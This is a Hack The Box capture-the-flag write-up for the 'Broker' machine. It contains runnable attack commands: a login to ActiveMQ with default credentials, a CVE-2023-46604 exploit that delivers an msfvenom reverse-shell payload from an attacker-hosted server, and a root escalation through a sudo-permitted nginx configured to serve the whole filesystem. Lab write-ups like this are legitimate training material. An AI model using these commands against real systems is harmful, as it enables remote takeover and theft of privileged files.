Broker - HTB

Date : 21 Dec 2023 Thursday

Recon

Nmap

nmap --min-rate 1000 -p- -Pn 10.129.230.87 -oN nmap_tcp.txt

Output :

Screenshot from 2023-12-21 14-23-15

So we can see different ports are open on the machine lets start with port 80.

Screenshot 2023-12-21 at 14-25-41 Apache ActiveMQ

so we can see here ActiveMQ is running lets check the version

Visiting /admin endpoint

Trying with default credentials

Username: Admin
Password : Admin

It worked

Screenshot 2023-12-21 at 14-29-10 localhost ActiveMQ Console

we can see the version of the activemq that is 5.15.15

Shell as activemq

Upon Searching for exploit related to this version i came across this repo:

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

By following the instruction we can easily get the shell :

git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git

msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf

python3 -m http.server

Edit the file poc-linux.xml and adress for the poc-linux.xml

go run main.go -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:$RPORT/poc-linux.xml

Privilege escalation

sudo -l

Screenshot from 2023-12-21 14-37-13

we can execute the nginx with root privileges so let’s start a web server which give is root access to the server on which it is running

cat /etc/nginx/nginx.conf | grep -v "/#"

cat /etc/nginx/sites-enabled/default

make a file on your system

nano nginx.conf

user root;
worker_processes auto;
pid /run/nginx2.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
	worker_connections 768;
}

http {
	server {
    		listen 1337;
    		location / {
    			root /;
    		}
        
      }
}

start python server

python -m http.server

Download it on the machine in the /dev/shm directory

wget http://$RHOST:8000/nginx.conf

start the server

sudo nginx -c /dev/shm/nginx.conf

download the flag :

 curl http://localhost:1337/root/root.txt